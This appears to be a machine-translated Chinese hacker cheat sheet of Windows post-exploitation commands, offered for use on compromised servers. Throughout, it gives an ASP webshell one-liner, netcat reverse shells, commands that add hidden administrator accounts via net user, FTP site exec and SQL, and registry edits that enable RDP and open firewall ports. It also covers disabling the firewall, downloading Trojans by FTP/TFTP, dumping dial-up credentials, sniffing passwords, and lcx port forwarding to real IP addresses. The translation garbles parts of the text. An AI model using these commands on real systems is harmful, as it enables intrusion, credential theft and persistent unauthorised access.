Echo ^ <% eval request ("#") % ^> C: \ wmpub \ hkfe666 \ h4ck. asp
Md hack create hack folder
Local nc-vv-p-l Port
Server nc path-e cmd path ip Port
Rd hack Delete the hack folder
Type d: \ wwwroot \ hack. asp
Del d: \ wwwroot \ hack. asp Delete hack. asp
Dir c: \ view all folders and file information in the c root directory
Tree e: \ Display the directory Tree of the edisk File
Reg query "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp"/v portnumber
Check whether the terminal is 3389?
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server to see what is the key value of fDenyTSConnections? If the value is 0, it is on and 1 is off.
Can netstat-ano see 3389 enabled?
Net stop yyagent
Net stop sharedaccess
/C dir d: \ freehost \ weiquanguang \ cnhonker *. */w/o/s
First, net stop sharedacess is disabled, and then net stop yyagent is disabled.
Administrator is allowed by default. In this case, you need to add Users to the Remote Desktop Users group at the same time.
Net user xxx pppp/add & net localgroup administrators xxx/add
Net localgroup administrators xxx/add
Net localgroup "Remote Desktop Users" xxx/add Remote Desktop Users can set.
Gpedit. msc
Common system commands
Gpedit. msc computer Group Policy
Compmgmt. msc Computer Management
Devmgmt. msc device management
Diskmgmt. msc disk management
Fsmgmt. msc share management
Lusrmgr. ms Local User Management
Notepad Board write
Services. msc Service Management
Enable telnet
@ Echo off
SC config tlntsvr start = auto
Net start telnet
End a process in CMD Mode
1. You can find the PID of the related process through tasklist.
Syntax: tasklist/svc uses taskkill pid to disable the process. Syntax: taskkill/im process name/f
Ii. ntsd-c q-p PID can forcibly stop the running process
Zxarps.exe-idx 0-ip Destination IP-port 80, 21, 3389-logfilter "+ post, + user, + pass"
Dialupass/allusers/stext "c: \ 1.txt"
========================================================== ======================
Query user query Login user
Logoff ID indicates a user
Net user to view all users
C: \ xp3389.exe-
Net user 1 1/add
Net1 localgroup administrators 1/add
C: \> net1 user guest/active: yes enable this user
========================================================== ========================
Whoami view system-wide Permissions
Call System Permissions
C: \> c: \ windows \ system32 \ cacls.exe c: \ windows \ system32 \ net.exe/t/e/g everyone: f
========================================================== ============================
Command for adding an account under the FTP command line; very nice...
C: \> ftp
Ftp> open 192.168.0.22
Ftp> quote site exec net.exe user admin $ jinwei58/add
Ftp> quote site exec net.exe localgroup admin $/add
200 EXEC command successful (TID = 33 ).
========================================================== ================================
Ftp command
Echo open your FTP> cmd.txt
Echo account> cmd.txt
Echo password> cmd.txt
Echo binary> cmd.txt
Echo get Trojan .exe> mongo.txt
Echo bye> cmd.txt
Ftp-s: cmd.txt
Trojan .exe
Trojan .exe
Del pai.txt./q
========================================================== ======================================
Quote site exec net user Username Password/add user
Quote site exec net localgroup administrators user name/add
Tasklist \ svc // shell column Process
========================================================== ======================================
SQL statements and management users
Select MyCmd ("net user ");
Select state ("net user ")
Select external shell ("net user ")
========================================================== ======================================
Netstat-
1. query open ports of the Terminal
Netstat-an | find "3389 ″
========================================================== ======================================
Query terminal port 3389
REG query HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber
========================================================== ======================================
2. Enable terminal 2003
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 00000000/f
========================================================== ======================================
3. Change the terminal port to 2008 (0x7d8)
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ Wds \ rdpwd \ Tds \ tcp/v PortNumber/t REG_DWORD/d 0x7d8/f
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber/t REG_DWORD/d 0x7D8/f
========================================================== ======================================
4. Remove restrictions on Terminal Services and IP connection from xp & 2003 system firewall
Reg add hklm \ SYSTEM \ CurrentControlSet \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List/v 3389: TCP/t REG_SZ/d 3389: TCP: *: Enabled: @ xpsp2res. dll,-22009/f
========================================================== ======================================
5. Enable Win2000 terminal (restart required)
First, upload the terminal-enabled tool to the c: \ of the target host :\
Run c: \ ver3389.exe and wait for the system to restart.
========================================================== ==================================
6. Solve the command that exceeds the maximum number of connections on the terminal.
Mstsc/v: ip: 3389/console
========================================================== ==================================
Disable Firewall
Net stop sharedaccess
========================================================== ====================================
First, upload the dual-open 3389 tool to c: \ under the target host :\
Run the c: \ 3389.exe command.
========================================================== ====================================
Tasklist/SVC> c: \ 3389.txt
========================================================== ==================================
View adsl
Dialupass.exe/allusers/stext "c: \ 1.txt"
========================================================== ==================================
Port ing-lcx usage
Lcx command
Local run lcx.exe-listen 3001 3002
C: \ lcx.exe-slave 61.184.188.125 3001 Intranet IP address of broilers 3389
C: \ recycler \ lcx.exe-slave 121.61.225.211 3001 192.170.0.23 3389
Local Connection: 127.0.0.1: 3002
========================================================== ==================================
Here is the nc command description:
2. Raise the right of nc bounce:
Server execution: nc location-l-p 8080-t-e cmd location
Listen to local inbound stack information
NC address cmd address
------------------P port to open the local port
Local execution: telnet + Server IP address + 446
------------------T responds to the stack request in the form of telnet
Command: tftp-I ip address get Trojan name .exe-e program redirection
Extra: upload an NC to Webshell, bounce a shell, use htran to forward port data, and then sniff locally.
2. Reduce operation Permissions
////////////////////////////
Now, a local port is monitored.
Nc-vv-l-p 8080
It is best to use ports 80 or 8080, which are much less likely to be intercepted by the firewall.
Run the following command in WebShell to connect to the port we listen to and get mongoshell:
Nc-vv IP 8080-e C: \ Documents ents and Settings \ All Users \ Documents ents \ Documents .exe
-- ===================================================== ======================================
1. query the terminal port
Xp & 2003: REG query HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber
General purpose: regedit/e tsp. reg "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal server \ Wds \ rdpwd \ Tds \ tcp"
Type tsp. reg
2. Enable the XP & 2003 terminal service
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp \ PortNumber \
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 0/f
3. Change the terminal port to 20008 (0x4E28)
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ Wds \ rdpwd \ Tds \ tcp/v PortNumber/t REG_DWORD/d 0x4E28/f
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber/t REG_DWORD/d 0x4E28/f
4. Remove the restrictions on port 2003 and IP connection of the terminal service from the xp & 3389 system firewall.
Reg add hklm \ SYSTEM \ CurrentControlSet \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List/v 40404: TCP/t REG_SZ/d 40404: TCP: *: Enabled: @ xpsp2res. dll,-22009/f
5. Enable Win2000 terminal with port 3389 (restart required)
Echo Windows Registry Editor Version 5.00> 2000.reg
Echo.> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ netcache]> 2000.reg
Echo "Enabled" = "0"> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]> 2000.reg
Echo "ShutdownWithoutLogon" = "0"> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer]> 2000.reg
Echo "EnableAdminTSRemote" = dword: 00000001> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]> 2000.reg
Echo "TSEnabled" = dword: 00000001> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermDD]> 2000.reg
Echo "Start" = dword: 00000002> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermService]> 2000.reg
Echo "Start" = dword: 00000002> 2000.reg
Echo [HKEY_USERS \. DEFAULT \ Keyboard Layout \ Toggle]> 2000.reg
Echo "Hotkey" = "1"> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]> 2000.reg
Echo "PortNumber" = dword: 00000D3D> 2000.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp]> 2000.reg
Echo "PortNumber" = dword: 00000D3D> 2000.reg
6. Force restart the Win2000 & Win2003 System (automatically restart after the last sentence is executed)
@ Echo off & cd/d % temp % & echo [version]> restart. inf
(Set inf = InstallHinfSection DefaultInstall)
Echo signature = $ chicago $> restart. inf
Echo [defainstall install]> restart. inf
Rundll32 setupapi, % inf % 1% temp % \ restart. inf
7. Disable TCP/IP Port filtering (restart required)
Reg add hklm \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ parameters/v EnableSecurityFilters/t REG_DWORD/d 0/f
8. When the maximum number of connections of the terminal is exceeded, use the following command to connect
Mstsc/v: ip: 3389/console
9. Adjust NTFS partition Permissions
Cacls c:/e/t/g everyone: F (all rights to drive c)
Cacls % systemroot % \ system32 \ *. exe/d everyone (deny everyone access to the exe file in system32)